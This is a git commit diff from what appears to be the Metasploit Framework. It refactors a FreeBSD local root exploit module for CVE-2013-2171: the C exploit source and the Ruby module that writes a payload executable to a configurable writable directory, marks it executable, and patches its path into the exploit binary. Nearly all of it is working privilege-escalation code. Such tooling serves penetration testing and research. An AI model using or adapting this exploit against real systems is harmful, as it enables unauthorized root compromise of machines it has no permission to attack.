Fix CVE-2013-2171 with @jlee-r7 feedback

2024-07-18 18:31:41 +02:00 · 2013-06-25 10:40:55 -05:00 · 2013-06-25 10:40:55 -05:00 · b32513b1b8
commit b32513b1b8
parent c9a7372f9f
3 changed files with 21 additions and 11 deletions
--- a/data/exploits/CVE-2013-2171.bin
+++ b/data/exploits/CVE-2013-2171.bin
--- a/external/source/exploits/CVE-2013-2171/exploit.c
+++ b/external/source/exploits/CVE-2013-2171/exploit.c
@ -17,7 +17,7 @@ int main(int ac, char **av) {
   struct ptrace_io_desc piod;
   char *s, *d;
   int pid;
-   char *bin = "/tmp/W00T";  // "W00T" is just a place holder
+   char *bin = "MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890";  // is just a place holder

   if (geteuid() == 0)  {
        setuid(0);
--- a/modules/exploits/freebsd/local/mmap.rb
+++ b/modules/exploits/freebsd/local/mmap.rb
@ -12,6 +12,7 @@ class Metasploit4 < Msf::Exploit::Local

 	include Msf::Exploit::EXE
 	include Msf::Post::Common
+	include Msf::Post::File
 	include Msf::Exploit::FileDropper

 	def initialize(info={})
@ -49,6 +50,11 @@ class Metasploit4 < Msf::Exploit::Local
 				'DisclosureDate' => "Jun 18 2013",
 			}
 		))
+		register_options([
+			# It isn't OptPath becuase it's a *remote* path
+			OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
+		], self.class)
+
 	end

 	def check
@ -58,7 +64,7 @@ class Metasploit4 < Msf::Exploit::Local
 		Exploit::CheckCode::Safe
 	end

-	def write_file(data, fname)
+	def write_file(fname, data)
 		oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
 		session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
 		session.shell_command_token("chmod +x #{fname}")
@ -67,10 +73,17 @@ class Metasploit4 < Msf::Exploit::Local
 		return (chk =~ /ERROR: cannot open/) ? false : true
 	end

+
 	def upload_payload
-		fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
+		fname = datastore['WritableDir']
+		fname = "#{fname}/" unless fname =~ %r'/$'
+		if fname.length > 36
+			fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters")
+		end
+		fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
+
 		p = generate_payload_exe
-		f = write_file(p, fname)
+		f = write_file(fname, p)
 		return nil if not f
 		fname
 	end
@ -80,17 +93,14 @@ class Metasploit4 < Msf::Exploit::Local
 		# Metasm does not support FreeBSD executable generation.
 		#
 		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
-		f    = File.open(path, 'rb')
-		x    = f.read(f.stat.size)
-		f.close
-
-		x.gsub(/W00T/, File.basename(payload_fname))
+		x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
+		x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
 	end

 	def upload_exploit(payload_fname)
-		fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+		fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
 		bin = generate_exploit(payload_fname)
-		f = write_file(bin, fname)
+		f = write_file(fname, bin)
 		return nil if not f
 		fname
 	end